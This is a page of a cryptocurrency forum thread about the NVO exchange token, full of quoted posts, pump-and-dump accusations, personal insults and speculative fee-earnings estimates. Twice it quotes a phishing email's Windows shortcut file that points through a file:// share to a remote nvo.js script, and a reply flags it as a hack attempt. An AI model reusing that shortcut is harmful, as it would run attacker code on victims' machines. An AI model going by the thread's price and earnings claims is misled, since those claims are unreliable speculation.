Pages:
Author

Topic: [ANN][CrowdSale Ended]🌟🌟🌟🌟 NVO Decentralized Exchange | MultiWallet 🌟🌟🌟🌟 - page 48. (Read 170086 times)

Activity: 99
Merit: 11
Looks like you are only coming here to spread misinformation and hate on NVO  Roll Eyes
Are you the guy that tried to scam the NVO team and got owned big time ?  Grin is this your revenge ?
Activity: 494
Merit: 12
Good afternoon. Has anyone heard from CEX (Veserus)? Launch this month or is it unlikely?

No dude, it was pure pump and dump performed by TSWR (  a regular investor, not a team member) from his reddit post. It was pure speculation from him and several members who hyped the price artificially. There is no particular reason for the price to grow. No any development updates, no news from the team, nothing. The team doesn't communicate at all and it's been silent for a while. Yet there are people who fall for it.

The team does communicate to those of us in slack who didn't get banned.  Then TSWR takes those communications from the team and relays them to others.  It is called cooperation.

Nice lie, doesn't work ------>>> https://i.imgur.com/KyijWZK.png

TSWR lies that he communicates with the team, the update in reddit is all made up ----->> https://i.imgur.com/UJYDzAX.png
Good afternoon. Has anyone heard from CEX (Veserus)? Launch this month or is it unlikely?
No dude, it was pure pump and dump performed by TSWR (  a regular investor, not a team member) from his reddit post. It was pure speculation from him and several members who hyped the price artificially. There is no particular reason for the price to grow. No any development updates, no news from the team, nothing. The team doesn't communicate at all and it's been silent for a while. Yet there are people who fall for it.
Do you know how many people bought in this last week? Do you know how many people "dumped" to get out, and what their positions were beforehand? Do you see TSWR still here, or did he leave after "dumping" as you assert? Do pump-and-dumps normally come from a few insiders selling a lot of shares at once, or from a lot of sellers selling very little spread out over time?

If you used your tiny little mind to spend as much time researching the subject matter you rage on about as you spend mashing your little fists on the keyboard about your hallucinatory delusions, you would know the answers to these questions, and would come to the rational conclusion that this is an organic growth spurt from a small number of addresses buying in for six figure dollar amounts in a short amount of time, not a "pump and dump" scheme in any sense of the phrase. But, your irrational blinding hatred for anything to do with this project makes it impossible for you to act rationally or objectively, so I can only presume this newest outburst to be part of your Clozapine withdrawal symptoms.

In all seriousness, though, I do hope you seek a mental health professional to help you cope with these cognitive distortions. Perhaps this could be of some help: http://www.dinamika-sofia.com

Hah the pumping clowns appeared suddenly to defend themselves. The thing that the 4 of you did is called market manipulation. The volumes are so low that even one person can pump the price.  TSWR has admitted multiple times he is responsible for the price pump! Yesterday you complained in slack that team is not communicating with you ( the insider) " probably they are working very hard and can't reply" So get your facts straight Wink.It's really odd that you forgot so quickly about the team's  promises about communication improvement after wallet release. People are not dumb. As I said, there is no reason for the price to grow at the moment.

There is your reason;
https://en.wikipedia.org/wiki/Supply_and_demand
buying a low volume coin does not make you a market manipulator, there are fees on Counterparty... it isn't bithumb.

Do you know how many people bought in this last week? Do you know how many people "dumped" to get out, and what their positions were beforehand? Do you see TSWR still here, or did he leave after "dumping" as you assert? Do pump-and-dumps normally come from a few insiders selling a lot of shares at once, or from a lot of sellers selling very little spread out over time?

If you used your tiny little mind to spend as much time researching the subject matter you rage on about as you spend mashing your little fists on the keyboard about your hallucinatory delusions, you would know the answers to these questions, and would come to the rational conclusion that this is an organic growth spurt from a small number of addresses buying in for six figure dollar amounts in a short amount of time, not a "pump and dump" scheme in any sense of the phrase. But, your irrational blinding hatred for anything to do with this project makes it impossible for you to act rationally or objectively, so I can only presume this newest outburst to be part of your Clozapine withdrawal symptoms.

In all seriousness, though, I do hope you seek a mental health professional to help you cope with these cognitive distortions. Perhaps this could be of some help: http://www.dinamika-sofia.com

Hah the pumping clowns appeared suddenly to defend themselves. The thing that the 4 of you did is called market manipulation. The volumes are so low that even one person can pump the price.  TSWR has admitted multiple times he is responsible for the price pump!

Yesterday you complained in slack that team is not communicating with you ( the insider), here is the proof:

https://i.imgur.com/KyijWZK.png

TSWR lying as well   ---->> https://i.imgur.com/UJYDzAX.png

So get your facts straight Wink. Now you have lost all credibility in the eyes of the people. You are clearly lying and no one should trust you anymore.

This project is solid. There has been enough updates from the team on slack and other venues. If you need daily updates or "daily news" in order to confort you in your investment choices, you are weak and should not be investing money in the first place, period.

I have been holding and adding up for a while now, and will keep doing so.

Kiss

Activity: 77
Merit: 1

still no news.. we are all waiting
I understand. We have to wait.

If it is equal to the launch of the beta wallet, we will only see updates here in the forum on the eve of the launch of CEX.
Activity: 356
Merit: 255
Hello Dev,

I happen to be late comer to the party  Angry I bought NVO ICO but yet to figure out how to claim it.When I check the https://www.blocktrail.com/BTC/address of my BTC, it shows that the account is dormant with my 216 NVO sitting in there  Sad I need urgent help to claim this. Thanks

Unless you wish to sell your tokens immediately, there is no actual urgency to claim them. In fact, if you have the private key for the bitcoin address that holds those tokens, you have already "claimed" them by nature of holding the private key.

If you would like to sell them immediately, there is a thorough how-to on the official Medium account: https://medium.com/nvo-exchange/how-to-buy-and-trade-nvst-nvo-tokens-on-counterparty-decentralized-exchange-d82566f1316b

A more detailed explanation of how Counterparty works is posted here: https://nvo.party/faq/?What_is_Counterparty_exactly#5
No dude, it was pure pump and dump performed by TSWR (  a regular investor, not a team member) from his reddit post. It was pure speculation from him and several members who hyped the price artificially. There is no particular reason for the price to grow. No any development updates, no news from the team, nothing. The team doesn't communicate at all and it's been silent for a while. Yet there are people who fall for it.

Activity: 1
Merit: 0
Hello Dev,

I happen to be late comer to the party  Angry I bought NVO ICO but yet to figure out how to claim it.When I check the https://www.blocktrail.com/BTC/address of my BTC, it shows that the account is dormant with my 216 NVO sitting in there  Sad I need urgent help to claim this. Thanks
Activity: 111
Merit: 3

No dude, it was pure pump and dump performed by TSWR (  a regular investor, not a team member) from his reddit post. It was pure speculation from him and several members who hyped the price artificially. There is no particular reason for the price to grow. No any development updates, no news from the team, nothing. The team doesn't communicate at all and it's been silent for a while. Yet there are people who fall for it.

The team does communicate to those of us in slack who didn't get banned.  Then TSWR takes those communications from the team and relays them to others.  It is called cooperation.
Activity: 22

Are you aware of what libel is Emanuil?

It was not a pump and dump. I know you are just dying to be right about your accusations of this project being a scam and every cent that the price of NVST rises it continues to prove you wrong.

As far as the price growing, are you not familiar with the most basic concept of economics, supply and demand? No one wants to sell their NSVT as there are so many good things happening. Therefore when there isn't much for sale, people will pay what the asking price is. People are willing to pay that price because of the progress in the project. Not because of a pump and dump.  You aren't in slack any more so you have no idea what is going on and what TSWR is involved in.

Seriously child, just go away.

Activity: 12

still no news.. we are all waiting
Activity: 77
Activity: 139
Merit: 104

(This is an example just fees and not trade volume)

So if they do $7 mil that week in fees ( $1 mil per day and keep in mind fees are sent to a holding wallet)  and if nvsx is $0.99 cents there will be 6,930,000 actual nvsx sent out and divided amongst the nvst holders.

now if let's say i held 1060 nvst out of the 6,930,000 NVSX I would receive 1 nvsx at the end of the week , i would then exchange that 1 NVSX for $0.99 (since one nvsx is only worth $0.99) cents worth of btc and that btc is taken from the $7 million in fees that are being stored in the holding wallet.

if the DEX fees could be $7 mil a week (very likely more by the end of 2018) and you have 1060 nvst you'll gain 7.000.000 / 15.000.000 nsvt =

$0,46 x 1060 = $494 a week  ($25600 year)

and the token is so cheap righ now? my guess is 30/50$ minimum.

i see from xchain that fresh money is coming and almost no NVST are left on counterparty dex.

7 000 000 $ in fees to be redistributed would mean $1B volume traded each days. Between 9 and 12 exchanges, depending on market activity, are having daily volume higher than $1B.

Feasible indeed, but I don't think NVO will reach it in 2018. It takes time for people to transfer from using an exchange which they are used to to another one. Wait and see, and I hope I'm wrong ofc.
thank you for the clarification  i tried to make it clear that i was just talking about the fees only and not  trade volume for an easy  explanation. I got so focused on that i screwed up the math, good ol'e trigul saving the day.

Isn't there also a spreadsheet somewhere for calculating how much you could earn?
Do we have news about the distribution for those who sent from an exchange?

Can someone from the team help me out? I sent a deposit from an exchange during the token sale. I heard some people had luck getting their tokens on this forum. Sent it from Coinbase.
Have you tried contacting Coinbase? Although I doubt they would be very eager to help people out with getting their tokens back given the workload that would entice.

I haven't yet. I figured I would reach out to the NVO team. I received an email from someone called TON BI ([email protected]) trying to get me to download a file. When i opened it in Text it had the following lines - is this spam?

[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9
[InternetShortcut]
URL=file://///nvoassets.cf/users/nvo.zip/nvo.js
IDList=
HotKey=0
IconFile=C:\WINDOWS\System32\shell32.dll
IconIndex=126

that's a hack attempt from a fake account but with (supposedly) real account information. NVO staff don't use gmail accounts.
Activity: 3

Can someone from the team help me out? I sent a deposit from an exchange during the token sale. I heard some people had luck getting their tokens on this forum. Sent it from Coinbase.
Have you tried contacting Coinbase? Although I doubt they would be very eager to help people out with getting their tokens back given the workload that would entice.

I haven't yet. I figured I would reach out to the NVO team. I received an email from someone called TON BI ([email protected]) trying to get me to download a file. When i opened it in Text it had the following lines - is this spam?

[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9
[InternetShortcut]
URL=file://///nvoassets.cf/users/nvo.zip/nvo.js
IDList=
HotKey=0
IconFile=C:\WINDOWS\System32\shell32.dll
IconIndex=126

Activity: 1358
Merit: 834

Activity: 3

Activity: 127

It's on the entire group of people who don't source their information by joining and paying attention to 50 different discords per day.

Surely it makes sense to create a blog in some way to make the news and updates searchable publicly, right?

Hey, If you really want to do something, you’ll find a way. If you don’t, you’ll find an excuse.
— Jim Rohn

(jk, couldn't resist  Grin)

Completely right, I wouldn't want to have my solid marketing data scattered across tagged instant messaging segments, I'd want them presented in a consumable and indexable way for investors.
so reddit is not a good enough source for you?
Pages:
Jump to: